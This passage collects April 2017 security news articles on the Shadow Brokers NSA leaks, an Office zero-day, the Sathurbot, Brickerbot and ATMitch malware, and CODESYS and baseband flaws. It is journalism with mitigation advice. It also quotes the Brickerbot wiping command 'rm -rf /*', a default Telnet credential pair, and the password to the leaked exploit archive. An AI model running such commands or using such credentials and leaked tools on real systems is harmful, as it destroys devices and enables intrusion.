The security firm reported the Windows zero-day attacks to Microsoft back in January 2017, for this reason, McAfee decided to publicly disclose the vulnerability and a day after also FireEye made the same.

This Tuesday Microsoft will release security updates, let’s hope the company will address also the zero-day exploited in the wild.

Below the recommendations to mitigate such kind of Windows zero-day attack:

Do not open any Office files obtained from untrusted locations.
According to our tests, this active attack cannot bypass the Office Protected View, so we suggest everyone ensure that Office Protected View is enabled.


Shadow Brokers Release More NSA Exploits

10.4.2017 securityweek BigBrothers
The hacker group calling itself “Shadow Brokers” has released another round of exploits and tools allegedly used by the NSA-linked threat actor “Equation Group,” along with a message to U.S. President Donald Trump.

Over the weekend, the group published the password to a previously released password-protected archive. An analysis of the files revealed the existence of various exploits and lists of organizations apparently targeted by the Equation Group.

Google Project Zero researcher Tavis Ormandy said one of the leaked exploits, dubbed EXACTCHANGE, relies on a Linux kernel vulnerability that can be exploited for local privilege escalation. Ormandy believes the Equation Group had the exploit “for years” before it was discovered by Google researchers in 2009.

An analysis conducted by Maksym Zaitsev showed that the leaked files include what appear to be Solaris exploits, a cross-platform RAT, Linux keyloggers, exploits targeting Cisco firewalls, system fingerprinting tools, an IP.Board exploit, and Apache and Samba zero-days affecting several Linux distributions.

A researcher who uses the online moniker “x0rz” also analyzed the latest dump and identified a tool that can clean logs (TOAST), a fake Chinese browser (ELECTRICSLIDE), and several GSM-related tools (CURSEHAPPY, EDITIONHAZE, LIQUIDSTEEL, SHAKENGIRAFFE, WHOLEBLUE). He also found evidence that the Equation Group had been looking for clues of attacks by other threat actors on compromised systems.

Experts also found lists of IP addresses and domain names that may belong to organizations targeted by the Equation Group, and they pointed out that victims include U.S. allies.

The Shadow Brokers had initially attempted to sell the exploits they obtained, but none of their strategies, including auctions and direct sale offers, was successful. While the group has now made available another batch of files for free, Zaitsev and others, including Edward Snowden, believe there are still some files that have not been released.

8 Apr
Edward Snowden ✔ @Snowden
Quick review of the #ShadowBrokers leak of Top Secret NSA tools reveals it's nowhere near the full library, but there's still so... (1/2)
Follow
Edward Snowden ✔ @Snowden
...much here that NSA should be able to instantly identify where this set came from and how they lost it. If they can't, it's a scandal.
8:32 PM - 8 Apr 2017
881 881 Retweets 1,475 1,475 likes

In a message they posted on Medium, the Shadow Brokers told President Trump that they are disappointed by his actions.

“TheShadowBrokers voted for you,” the hackers said. “TheShadowBrokers supports you. TheShadowBrokers is losing faith in you. Mr. Trump helping theshadowbrokers, helping you. Is appearing you are abandoning ‘your base’, ‘the movement’, and the peoples who getting you elected.”

The group has once again claimed that it is not connected to Russia, but they did say that Russia and Putin are the United States’ “best allies until the common enemies are defeated and America is great again.”

However, some people have pointed out that the timing of the leak is suspicious – it comes shortly after the U.S. decided to bomb Syria, which is an ally of Russia. Some experts had previously suggested that the Shadow Brokers is actually an English-speaking group.

While many of the exploits leaked previously by Shadow Brokers turned out to rely on old vulnerabilities, some companies, including Cisco, did identify some zero-days. It remains to be seen if tech companies confirm any unpatched flaws in the latest leaks.


Sathurbot Botnet Targets WordPress Accounts

10.4.2017 securityweek BotNet

A recently observed backdoor Trojan is ensnaring victims’ computers into a botnet that attempts to brute-force its way into WordPress accounts. The compromised WordPress sites are then used to spread the malware further.

Dubbed Sathurbot, the backdoor Trojan uses torrents as a delivery medium. Compromised websites are used to host fake movie and software torrents and, when a user searches the web for a movie or software to download, links to these websites are served instead of legitimate torrents.

Users accessing movie subpages are served with the same torrent file, while those going for software are served a different torrent file. Because the torrents are well-seeded, they might appear legitimate. Both the movie and the software torrent contain an executable and are meant to entice the victim into running it, thus loading the Sathurbot DLL.

Once launched, the malware informs the victim that their machine has become a bot in the Sathurbot network. Sathurbot also retrieves its command and control (C&C) at startup. Communication with the server involves status reporting, task retrieval, and the receiving of links to other malware downloads.

“Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list,” ESET security researchers warn.

The malware reports its successful installation and a listening port to the server, and also reports back periodically, while waiting for additional tasks.

Sathurbot comes with some 5,000 plus basic generic words that are randomly combined to form 2-4 word phrases used as query strings via popular search engines. It then selects a random 2-4 word long text chunk from the webpage of each URL in the search results, and uses it for the next round of search queries. The second set of search results in used to harvest domain names.

The threat selects only the domains that are created using WordPress, but it appears that the threat is also interested in the Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS frameworks. The malware sends the harvested domains to the C&C.

The bot then receives a list of domain access credentials (formatted as login:password@domain) that it then probes for access, and ESET says that different bots try different login credentials for the same site. Further, to avoid being blocked, each bot only tries a single login per site and moves to the next domain.

“During our testing, lists of 10,000 items to probe were returned by the C&C,” ESET reveals. They also note that the XML-RPC API (particularly, the wp.getUsersBlogs API) of WordPress is used in the attack.

The bot also has the libtorrent library integrated, and is designed to become a seeder by downloading a binary file and creating the torrent. However, it appears that not all bots in the network perform all of these functions, as some are only used as web crawlers, others only attack the XML-RPC API, while others do both. Not all bots become seeders either.

“The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs,” the security researchers explain.

Consisting of over 20,000 infected computers, Sathurbot is believed to have been active since at least June 2016.


Flaw in Popular Framework Exposes Many ICS Devices to Attacks

10.4.2017 securityweek ICS
Hundreds of thousands of Industrial Internet of Things (IIoT) and industrial control systems (ICS) products could be exposed to hacker attacks due to critical vulnerabilities affecting a widely used piece of software from Germany-based 3S-Smart Software Solutions.

The flaws affect the CODESYS automation software for developing and engineering controller applications, specifically the Web Server component of the CODESYS WebVisu visualization software. The issues have been fixed by 3S-Smart Software Solutions, but experts believe it will take some time until the patch reaches all vulnerable devices.

The security holes, discovered by researchers at industrial cybersecurity startup CyberX, affect CODESYS Web Server 2.3 and prior, and they have been addressed with patch version 1.1.9.18. ICS-CERT has published an advisory describing the flaws.

One of the vulnerabilities, tracked as CVE-2017-6027, allows an attacker to upload arbitrary files to the CODESYS Web Server by sending a specially crafted request. Exploitation of the flaw can lead to arbitrary code execution.

The second vulnerability, identified as CVE-2017-6025, is a stack-based buffer overflow that exists because the size of strings sent to functions that handle the XML are not properly checked before they are copied to memory. An attacker can exploit this weakness to crash the application or execute arbitrary code.

Learn More at SecurityWeek's 2017 Singapore ICS Cyber Security Conference

According to CyberX, there are several possible exploitation scenarios. For example, an attacker can use a search engine such as Shodan to identify vulnerable devices that are directly connected to the Internet, and then remotely exploit the vulnerabilities.

Another scenario described by the security firm involves a malicious actor delivering a piece of malware that exploits the vulnerabilities via a USB drive. A remote attacker can also compromise the targeted organization’s IT network and from there move onto the OT network, where they would have access to vulnerable devices.

“Attackers could exploit the vulnerabilities to install back-doors in order to perform industrial cyberespionage, deploy ransomware, and execute cyber-sabotage operations to disrupt production or cause catastrophic safety failures and environmental damage,” researchers warned in a blog post.

CODESYS software is used in hundreds of PLCs and other products from companies worldwide. According to the vendor, more than a million devices that use CODESYS software are sold every year and, as of mid-2016, over half of the products listed in the company’s device directory had been using the vulnerable component.

CyberX said CODESYS was quick to develop a patch, which the security firm has tested and validated. However, vulnerabilities in third-party components can be problematic as it can take a lot of time until patches reach end-users.

“Each device manufacturer must first apply the CODESYS patch to their own code, then recompile the firmware, and then send a firmware update to their end-users. The CODESYS patch can’t be installed by end-user organizations,” CyberX explained. “Most devices require firmware to be ‘reflashed,’ which is a lengthier and more complicated process than standard software updates on your phone or PC.”

This is not the first time a vulnerability affecting a third-party component has exposed devices from numerous vendors. Back in 2015, researchers disclosed a serious flaw in a CodeWrights library used by many manufacturing and technology companies for HART-based field devices.


Beware of an Unpatched Microsoft Word 0-Day Flaw being Exploited in the Wild
9.4.2017 thehackernews Vulnerebility
It's 2017, and opening a simple MS Word file could compromise your system.
Security researchers are warning of a new in-the-wild attack that silently installs malware on fully-patched computers by exploiting a serious — and yet unpatched — zero-day vulnerability in all current versions of Microsoft Office on fully-patched PCs.
The Microsoft Office zero-day attack, uncovered by researchers from security firms McAfee and FireEye, starts simply with an email that attaches a malicious Word file containing a booby-trapped OLE2link object.
When opened, the exploit code gets executed and makes a connection to a remote server controlled by the attacker, from where it downloads a malicious HTML application file (HTA) that's disguised as a document created in Microsoft's RTF (Rich Text Format).
The HTA file then gets executed automatically with attackers gaining full code execution on the victim’s machine, downloading additional payloads from "different well-known malware families" to take over the victim's PC, and closing the weaponized Word file.
Zero-Day Attack Works on All Windows OS — Even Windows 10
According to researchers, this zero-day attack is severe as it gives the attackers the power to bypass most exploit mitigations developed by Microsoft, and unlike past Word exploits seen in the wild, it does not require victims to enable Macros.
Due to these capabilities, this newly discovered attack works on all Windows operating systems even against Windows 10, which is believed to be Microsoft's most secure operating system to date.
Besides this, the exploit displays a decoy Word document for the victims to see before terminating in order to hide any sign of the attack.
"The successful exploit closes the bait Word document and pops up a fake one to show the victim," McAfee researchers wrote in a blog post published Friday. "In the background, the malware has already been stealthily installed on the victim's system."
"The root cause of the zero-day vulnerability is related to the Windows Object Linking and Embedding (OLE), an important feature of Office."
Microsoft is aware of the zero-day flaw as the researchers say they responsibly disclosed the issue to the company after detecting active attacks leveraging this unpatched flaw back in January this year.
FireEye disclosed the details of the vulnerability a day after McAfee went public with the flaw.
The next scheduled Microsoft's release of security updates is this Tuesday, so it's highly unlikely the company will be able to deliver a patch before that day.
How to Protect Yourself against this Attack?
Since the attack works on fully patched systems, users are highly advised to follow the below recommendations to mitigate such attacks:
Do not open or download any suspicious Word files that arrive in an e-mail, even if you know the sender until Microsoft releases a patch.
Since the attack does not work when a malicious document is viewed in Office Protected View feature, users are advised to enable this feature to view any Office documents.
Always keep your system and antivirus up-to-date.
Regularly backup your files in an external hard-drive.
Disabling Macros does not offer any protection, but yet users are advised to do so in an attempt to protect themselves against other attacks.
Always beware of phishing emails, spams, and clicking the malicious attachment.


ATMitch – Crooks stole $800,000 from 8 ATMs in Russia using Fileless Malware
9.4.2017 securityaffairs Virus

According to Kaspersky Lab, crooks have robbed at least 8 ATMs in Russia and stole $800,000 in just one night using a Fileless malware dubbed ATMitch.
According to experts at Kaspersky, hackers have robbed at least 8 ATMs in Russia and stole $800,000 in just one night.

The cyber heist caught the attention of security experts that analyzing the CCTV footage have noticed a man walking up to the ATM and collecting cash apparently without interacting with the machine.

Security teams at the affected banks haven’t found any evidence of the presence of a malware or any sign of an intrusion. Just one of the targeted banks reported having discovered two files containing malware logs on the ATM.

The experts have discovered the following strings in the log files:

“Take the Money Bitch!”
“Dispense Success.”
In February, malware at Kaspersky Labs reported that crooks hit over 140 enterprises, including banks, telecoms, and government organizations in 40 countries. The cybercriminals leveraged a ‘Fileless malware.’

fileless malware

Malicious code is directly injected into the memory of the infected machine and the malware executes in the system’s RAM.

“A good example of the implementation of such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package it removes the package from the hard drive with file renaming and leaves part of itself in the memory with a payload. That’s why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that are going to be installed in the network by attackers.” reads the analysis published by Kaspersky.

The attack was first spotted by a bank’s security team that discovered a copy of the Meterpreter code, an in-memory component of the Metasploit framework, in a physical memory of a Microsoft domain controller (DC).

The experts at Kaspersky Lab tracked the threats as MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit. The malware leverage PowerShell scripts within the Windows registry to load the Meterpreter code directly into memory, similar techniques leveraging on the PowerShell were already adopted by other malware in the wild.
Malware researchers believe that hackers that targeted the banks carried out the attacks with a Fileless malware.

During the recent Kaspersky Security Analyst Summit held in St. Maarten, security researchers Sergey Golovanov and Igor Soumenkov provided further details about their investigation on the ATM hacks against two Russian banks.


Experts have tracked the malware as ATMitch, it was first spotted in Russia and Kazakhstan, the malicious code is remotely installed and executed on ATMs via its remote administration module.

“The malware, which we have dubbed ATMitch, is fairly straightforward. Once remotely installed and executed via Remote Desktop Connection (RDP) access to the ATM from within the bank, the malware looks for the “command.txt” file that should be located in the same directory as the malware and created by the attacker.” reads the analysis from Kaspersky.

fileless malware ATMitch

The attackers connect the ATM via SSH tunnel, install the malicious code and use it to instruct the ATM to dispense cash.

Since Fileless malware leverages the existing legitimate tools on a machine to remotely send the command to dispense the money, an operation that is very quick, just a few seconds are enough to empty the ATM without leaving traces.

“The malware uses the standard XFS library to control the ATM. It should be noted that it works on every ATM that supports the XFS library (which is the vast majority).” states Kaspersky.

The experts highlighted that attackers used a sophisticated method to compromise the bank network an access to the ATM’s back-end panel.
To avoid triggering the alarm, attackers physically accessed the ATM by drilling a golf-ball sized hole in the front panel. The hole allows the attackers to access to the cash dispenser panel using a serial distributed control wire (SDC RS485 standard).

Kaspersky experts explained that the technique was discovered after the police arrested a man dressed as a construction worker while he was drilling into an ATM.

Malware researchers warn ATM manufacturer and banks that crooks across Russia and Europe have already used the ATM drill attack for cyber heists.

Researchers did not identify a specific criminal gang behind these ATM hacks, anyway, they noticed that the source code used in the attacks contains references to the Russian language.

Kaspersky has discovered many similarities with techniques used by the have discovered many similarities with techniques used by the Carbanak and GCMAN cyber gangs.


Millions of mobile phones and laptops potentially exposed to attack leveraging baseband zero-days
9.4.2017 securityaffairs Vulnerebility

The researcher Ralf Weinmann revealed that millions of mobile phones and laptops are potentially exposed to attack leveraging baseband zero-days he discovered.
The researcher Ralf-Phillip Weinmann, managing director at security firm Comsecuris, has disclosed a zero-day baseband vulnerability affecting Huawei smartphones, laptop WWAN modules, and IoT components.

Baseband is firmware used on smartphones to connect to cellular networks, to make voice calls, and transmit data.

An attacker can exploit baseband flaws to eavesdrop mobile communications, take over the device making calls and sending SMS messages to premium numbers or to exfiltrate data.

The expert revealed the flaw this week at the Infiltrate Conference, the vulnerability could be exploited by attackers to execute a memory-corruption attack against affected devices over the air.

Fortunately, the attack is quite difficult to conduct.

The baseband vulnerability resides in the HiSilicon Balong integrated 4G LTE modems. The Balong application processor is called Kirin, it is produced by the Hisilicon Technologies, a subsidiary of Huawei Technologies. The affected firmware is present in several Huawei Honor smartphones, including the P10, Huawei Mate 9, Honor 9, 7, 5c and 6.

mobile baseband

Weinmann believes that millions of Honor smartphones could be exposed to the to attack.

Weinmann presented multiple baseband vulnerabilities found in the Kirin application processor.

The expert also revealed that many laptops produced by IT vendors leverage the HiSilicon Balong integrated modem, such as a number IoT devices.

“This baseband is much easier to exploit than other basebands. Why? I’m not sure if this was intentional, but the vendor actually published the source code for the baseband which is unusual,” Weinmann said. “Also, the malleability of this baseband implantation doesn’t just make it good for device experimenting, but also network testing.”

Weinmann speculates HiSilicon may have wrong released the Kirin source code as part of a developer tar archive associated with the Huawei H60 Linux kernel data.

Weinmann demonstrated several attack scenarios against mobile phones.

A first attack scenario presented by the researcher involves setting up a bogus base station using open-source software called OpenLTE that is used by an attacker to simulate a network operator. The attacker can send specially crafted packets over the air that trigger a stack buffer overflow in the LTE stack causing the phone crashing. Once the phone rebooted an attacker can gain persistence installing a rootkit.

In a second attack scenario, the attacker with a physical access to the phone and private key pair data would install malicious tools on the firmware.

“It requires key material that is stored both by the carrier and on the SIM card in order to pass the mutual authentication between the phone and the network. Without this key material, a base station cannot pose as a legit network towards the device.”

Weinmann used for its test his own VxWorks build environment using an evaluation version of VxWorks 7.0 that shipped with Intel Galileo several years ago. The expert explained that the existence of a Lua scripting interpreter running in the baseband gives him further offensive options.

Weinmann did not disclose the technical details to avoid threat actors in the wild will abuse his technology.

“I have chosen to only disclose lower-severity findings for now. Higher severity findings are in the pipeline.” Weinmann said.


The Shadow Brokers release more alleged NSA hacking tools and exploits
9.4.2017 securityaffairs BigBrothers

The Shadow Brokers hacking crew sent a message to President Trump commenting recent political events and released more alleged NSA hacking tools.
The Shadow Brokers is the mysterious group that in October 2016 claimed to have stolen a bunch of hacking tools used by the NSA for its operations.

At the end of October 2016, the hackers leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation group compromised these targets using the hacking tools codenamed as INTONATION and PITCHIMPAIR. The Shadow Brokers provided the links to two distinct PGP-encrypted archives, the first one offered for free as a proof of the hack (its passphrase was ‘auctioned’), for the second one the group requested 1 million BTC.

The first archive was containing roughly 300MBs of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.The Equation Group ‘s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

The majority of files are at least three years old, meanwhile, the newest timestamp dating to October 2013.Early October, TheShadowBrokers complained that no one seems to be bidding on their precious archive, an alleged member of the hacker group expressed his dissent on the lack of interest in ponying up bitcoins to release the full NSA data dump.A couple of weeks before the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction received offers for less than two bitcoins.

In December 2016, the Shadow Brokers has changed the model of sale, it has put up the NSA’s hacking arsenal for direct sale on an underground website.

Back to the present, today the Shadow Brokers group released more alleged hacking tools and exploits that allegedly belong to the Equation Group.

The group has launched the bomb, it has finally released password for the encrypted dump of NSA files and anyone can access them.

The group shared the following password:

CrDj”(;Va.*NdlnzB9M?@K2)#>deB7mN

in a blog post on the Medium platform titled “Don’t Forget Your Base“

The post is an open letter to President Donald Trump, the group expressed its point of view on the Trump’s policy, it explicitly refers Goldman Sach, the air strike against Syria and removal of Steve Bannon from the National Security Council, among others.

“Respectfully, what the fuck are you doing? TheShadowBrokers voted for you. TheShadowBrokers supports you. TheShadowBrokers is losing faith in you. Mr. Trump helping theshadowbrokers, helping you. Is appearing you are abandoning “your base”, “the movement”, and the peoples who getting you elected.” reads the post.

A security expert that goes online with the Twitter handle x0rz, has uploaded all files after decryption on Github.

Shadow brokers tools

A close look at the archive revealed the existence of numerous tools that was developed to target specific platforms, including:

rpc.cmsd a remote root zero-day exploit for Solaris Unix-based operating system.

Follow
x0rz @x0rz
Solaris rpc.cmsd remote root exploit (TAO's EASYSTREET) #0day
3:42 PM - 8 Apr 2017
121 121 Retweets 101 101 likes
The NSA access insided the GSM network of the Pakistan’s mobile operator Mobilink.

Follow
x0rz @x0rz
NSA operators notes about their access inside 🇵🇰Pakistan Mobilink GSM network https://github.com/x0rz/EQGRP/blob/33810162273edda807363237ef7e7c5ece3e4100/Linux/doc/old/etc/user.mission.sicklestar.COMMON … #ShadowBrokers #EquationGroup #APT
5:41 PM - 8 Apr 2017
50 50 Retweets 48 48 likes
The NSA Tailored Access Operations team (TAO) used the TOAST framework to clean logs of Unix wtmp events.

Follow
x0rz @x0rz
TAO's TOAST framework used to clean Unix wtmp events, no logs no crime 😏 #opsec
4:50 PM - 8 Apr 2017
63 63 Retweets 68 68 likes
The Equation Group used the ElectricSlide tool to impersonate a Chinese browser with fake Accept-Language.


Follow
x0rz @x0rz
One of the #EquationGroup tool (ELECTRICSLIDE) impersonates a Chinese browser with fake Accept-Languagehttps://github.com/x0rz/EQGRP/blob/33810162273edda807363237ef7e7c5ece3e4100/Linux/bin/electricslide.pl …
5:53 PM - 8 Apr 2017
254 254 Retweets 262 262 likes
If you want, the group is still accepting donations, below its Bitcoin wallet: 19BY2XCgbDe6WtTVbTyzM9eR3LYr6VitWK

That received a total of 10.41198465 bitcoins


Shadow Brokers Group Releases More Stolen NSA Hacking Tools & Exploits
8.4.2017 thehackernews BigBrothers
Remember The Shadow Brokers? They are back.
A hackers group that previously claimed to have stolen a bunch of hacking tools (malware, zero-day exploits, and implants) created by the NSA and gained popularity last year for leaking a portion of those tools is back.
Today, The Shadow Brokers group released more alleged hacking tools and exploits that, the group claims, belonged to "Equation Group" – an elite cyber attack unit linked to the NSA.
Besides dumping some NSA's hacking tools back in August 2016, the Shadow Brokers also released an encrypted cache of files containing more NSA's hacking tools and exploits in an auction, asking for 1 Million Bitcoins (around $568 Million).
However, after failed auction, the group put up those hacking tools and exploits for direct sale on an underground website, categorizing them into a type — like "exploits," "Trojans," and "implant" — each of which ranged from 1 to 100 Bitcoins (from $780 to $78,000).
Now, the Shadow Brokers has finally released password for the encrypted cache of NSA's files, allowing anyone to unlock and download the auction data dump.
CrDj”(;Va.*NdlnzB9M?@K2)#>deB7mN
The password mentioned above for the encrypted NSA files was made public through a blog post published today.
The blog post, titled "Don't Forget Your Base," has been written as an open letter to President Donald Trump, containing political views expressed by the Shadow Brokers on Trump's recent policies and events, like the Goldman Sach, the air strike against Syria and removal of Steve Bannon from the National Security Council, among others.
A security researcher, who uses Twitter handle x0rz, has uploaded all files after decryption on Github and confirmed that the archive includes:
rpc.cmsd a remote root zero-day exploit for Solaris – Oracle-owned Unix-based operating system.
The TOAST framework that NSA's TAO (Tailored Access Operations) team used to clean logs of Unix wtmp events.
The Equation Group's ElectricSlide tool that impersonates a Chinese browser with fake Accept-Language.
The evidence of the NSA operators' access inside the GSM network of Mobilink, one of the Pakistan's popular mobile operator companies.
More key findings will come as soon as other security researchers delve into the dump.
At the time, it's not confirmed whether the group holds more NSA hacking tools and exploits or this is the last batch of documents the Shadow Brokers stole from the United States intelligence organization.


RensenWare ransomware – You will decrypt files only scoring .2 Billion in TH12 Game
8.4.2017 securityaffairs Virus

The rensenWare ransomware rather than demanding money, it requires the victims to score “over 0.2 billion” playing “TH12 game.
Security experts at MalwareHunterTeam have spotted a new ransomware dubbed ‘rensenWare’. The ransomware is very strange, rather than demanding money, it requires the victims to score “over 0.2 billion” playing “TH12 — Undefined Fantastic Object”.

The RensenWare ransomware would scan a machine for certain file types and used the AES-256 to encrypt the files. When the malware encrypts a file it would append the .RENSENWARE extension to it.

When RensenWare ransomware completes the file encrytion, it displays a ransom note featuring Captain Minamitsu Murasa from the Touhou Project series of shooting games made by Team Shanghai Alice.

The ransomware note tells the victims that they must score over .2 billion in the Lunatic level of a Touhou Project game called TH12 ~ Undefined Fantastic Object. If the victim does not reach that score or close the ransomware, he will not able to rescue the files forever.

“That’s easy. You just play TH12 ~ Undefined Fantastic Object and score over 0.2 billion in LUNATIC level. this application will detect TH12 process and score automatically. DO NOT TRY CHEATING OR TEMRMINATE THIS APPLICATION IF YOU DON’T WANT TO BLOW UP THE ENCRYPTION KEY!” reads the ransom note.


Follow
MalwareHunterTeam @malwrhunterteam
Found a surprising ransomware today: "rensenWare".
Not asks for any money, but to play a game until you reach a score - and it's not a joke.
7:05 PM - 6 Apr 2017
4,522 4,522 Retweets 4,266 4,266 likes
“A new ransomware called RensenWare was discovered today by MalwareHunterTeam that makes a unique ransom demand; score over 0.2 billion in the LUNATIC level of TH12 ~ Undefined Fantastic Object or kiss your files goodbye!” wrote Lawrence Abrams from BleepingComputers. “While I do not think this ransomware was ever meant to be distributed, it shows what a creative developer can do to torment their victims.”

The RensenWare ransomware will monitor the gaming progress of the victim by looking for a process called “th12.” The malware reads the processes memory to determine the current score and level of the game. When the victim reaches the Lunatic level and has scored over .2 billion points, the ransomware will save the key to the Desktop and initiate the decryption process.

Lawrence Abrams excludes that the rensenWare ransomware was developed for criminal purposes, “this program was most likely created as a joke. Regardless of the reasons, it illustrates another new and innovative way that a ransomware can be developed.”

During the encryption operation, the malware doesn’t try to delete shadow volumes or make any other action to prevent a victim from restoring their files. This suggests the ransomware was created as a joke or to only disturb a specific group of people.

The author of the ransomware Tvple Eraser explained its intent with a message shared on Twitter:

Follow
Tvple Eraser @0x00000Ff
Hell, I'll NEVER make any malware or any similar thing. making was so fun, however as a result, it made me so exhausted, /w no foods all day
3:00 PM - 7 Apr 2017
Retweets 4 4 likes
The rensenWare ransomware demonstrates the great creativity of the community of malware coders, the experts have no doubt, we will see many other ‘creative’ themes the future.

This malware doesn’t represent a threat, but it has the potential to become it.


Brickerbot botnet, the thingbot that permanently destroys IoT devices
8.4.2017 securityaffairs BotNet

Security researchers have spotted a new threat dubbed Brickerbot botnet that causes permanent damage to Internet of Things (IoT) devices.
Months ago we anticipated the possible spike in the number of IoT botnets, at the beginning it was Mirai, but later other dangerous thingbot appeared in the wild such as the Leet Botnet and the Amnesia botnet.

Now a new botnet, dubbed Brickerbot, appeared in the threat landscape, it was spotted by researchers at Radware that have found many similarities with the dreaded Mirai botnet.

The main difference with Mirai botnet is that this threat permanently destroys poorly configured IoT devices.
The Brickerbot botnet was discovered on March 20 when researchers at Radware observed attacks against one of its honeypots.

“Over a four-day period, Radware’s honeypot recorded 1,895 PDoS attempts performed from several locations around the world. Its sole purpose was to compromise IoT devices and corrupt their storage.”reads the analysis shared by Radware. “Besides this intense, short-lived bot (BrickerBot.1), Radware’s honeypot recorded attempts from a second, very similar bot (BrickerBot.2) which started PDoS attempts on the same date – both bots were discovered less than one hour apart –with lower intensity but more thorough and its location(s) concealed by TOR egress nodes.”

The honeypot logged 1,895 infection attempts by Brickerbot botnet in just four days, most of the attacks were originated from Argentina, while 333 attempts came from a Tor node.

The Brickerbot botnet leverages on Telnet brute force to compromise an IoT device, a technique like the Mirai’s one.

The Bricker does not try to download a binary, this means that experts from Radware were not able to retrieve the complete list of credentials used by the bot brute force attempts, the researchers were only able to record that the first attempted username/password pair was ‘root’/’vizxv.’

“Bricker does not try to download a binary, so Radware does not have a complete list of credentials that were used for the brute force attempt, but were able to record that the first attempted username/password pair was consistently ‘root’/’vizxv.'” continues the advisory.

The malicious code targets Linux-based IoT devices running the BusyBox toolkit which have their Telnet port open and exposed on the Internet.

The PDoS attempt attacks s originated from a limited number of IP addresses, the IoT devices are exposing the port 22 (SSH) and running an older version of the Dropbear SSH server. The vast majority of the devices Shodan as Ubiquiti network devices.

Brickerbot botnet

Once the malware has infected the device it starts scrambling the onboard memory using rm -rf /* and disabling TCP timestamps. It also limits the max number of kernel threads to one.

brickerbot botnet

Brickerbot malware also flushes all iptables firewall and NAT rules and adds a rule to drop all outgoing packets. It tries to wipe all code on the vulnerable IoT making them unusable.

Experts at Radware provided the following suggestions to protect IoT Devices:

Change the device’s factory default credentials.
Disable Telnet access to the device.
Network Behavioral Analysis can detect anomalies in traffic and combine with automatic signature generation for protection.
User/Entity behavioral analysis (UEBA) to spot granular anomalies in traffic early.
An IPS should block Telnet default credentials or reset telnet connections. Use a signature to detect the provided command sequences.


Sathurbot botnet, over 20,000 bots launched a distributed WordPress password attack
8.4.2017 securityaffairs BotNet

Experts observed a new threat targeting WordPress install, the Sathurbot botnet attempts to bruteforce WordPress accounts.
Once compromised a WordPress website, the Sathurbot botnet uses it to spread the malware.

The Sathurbot leverages torrents as a delivery mechanism, once a website is compromised it is used to host fake movie and software torrents. When victims search for a movie or a software to download they will receive malicious links instead of torrents.

Users will be served with the movie and the software torrent both containing an executable that once launched is tasked of loading the Sathurbot DLL.

“The movie subpages all lead to the same torrent file; while all the software subpages lead to another torrent file. When you begin torrenting in your favorite torrent client, you will find the file is well-seeded and thus appears legitimate. If you download the movie torrent, its content will be a file with a video extension accompanied by an apparent codec pack installer, and an explanatory text file.” reads the analysis published by ESET.”The software torrent contains an apparent installer executable and a small text file. The objective of both is to entice get the victim to run the executable which loads the Sathurbot DLL”

Sathurbot botnet

Once executed the Sathurbot Trojan notify the victims that their machine has become a bot in the Sathurbot botnet.

“Sathurbot can update itself and download and start other executables. We have seen variations of Boaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list.” states ESET.

Once infected the target site, the malware reports its successful installation to the C&C server and communicate also a listening port to the server. Periodically it contacts the C&C and while waiting for additional instructions.

Sathurbot botnet also implement black SEO technique to make malicious links available through the major search engines.

“Sathurbot comes with some 5,000 plus basic generic words. These are randomly combined to form a 2-4 word phrase combination used as a query string via the Google, Bing and Yandex search engines.” continues ESET.

“From the webpages at each of those search result URLs, a random 2-4 word long text chunk is selected (this time it might be more meaningful as it is from real text) and used for the next round of search queries.”

According to the experts, operators of the botnet are also interested in targeting websites running other CMSs such as Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS frameworks.

The bot sends the harvested domains to the C&C formatted as login:password@domain. The credentials are used to gain access to the website, operators implemented a distributed WordPress password attack using different bots to try different login credentials for the same site. The tactic allows attackers to avoid being blocked, each bot only tries a single login per site and moves to the next domain.

“During our testing, lists of 10,000 items to probe were returned by the C&C,” ESET adds.

The bot integrates the libtorrent library to implement a Torrent seeder. A binary file is downloaded and a torrent is created.

The experts noticed that not all bots in the network perform all of the above functions, some of them only work as web crawlers, others are used to brute force the websites and not all bots work as a seeder.

“The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks on wp.getUsersBlogs in their logs.” concludes ESET.

Experts speculate the Sathurbot botnet has been active since at least June 2016.

“Through examination of logs, system artifacts and files, the botnet consists of over 20,000 infected computers and has been active since at least June 2016.”


WikiLeaks Reveals CIA's Grasshopper Windows Hacking Framework
8.4.2017 thehackernews BigBrothers
WikiLeaks reveals 'Grasshopper Framework' that CIA used to build Customized Windows Malware
As part of its Vault 7 series of leaked documents, whistleblowing website WikiLeaks today released a new cache of 27 documents allegedly belonged to the US Central Intelligence Agency (CIA).
Named Grasshopper, the latest batch reveals a CLI-based framework developed by the CIA to build "customised malware" payloads for breaking into Microsoft's Windows operating systems and bypassing antivirus protection.
All the leaked documents are basically a user manual that the agency flagged as "secret" and that are supposed to be only accessed by the members of the agency, WikiLeaks claims.
Grasshopper: Customized Malware Builder Framework
According to the leaked documents, Grasshopper framework allows the agency members to easily create custom malware, depending upon the technical details, such as what operating system and antivirus the targets are using.
The Grasshopper framework then automatically puts together several components sufficient for attacking the target, and finally, delivers a Windows installer that the agency members can run on a target's computer and install their custom malware payloads.
"A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components," the documentation reads. "Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload."
The whistleblowing website claimed the Grasshopper toolset was allegedly designed to go undetected even from the anti-virus products from the world's leading vendors including Kaspersky Lab, Symantec, and Microsoft.
CIA's Grasshopper Uses 'Stolen' Russian Malware
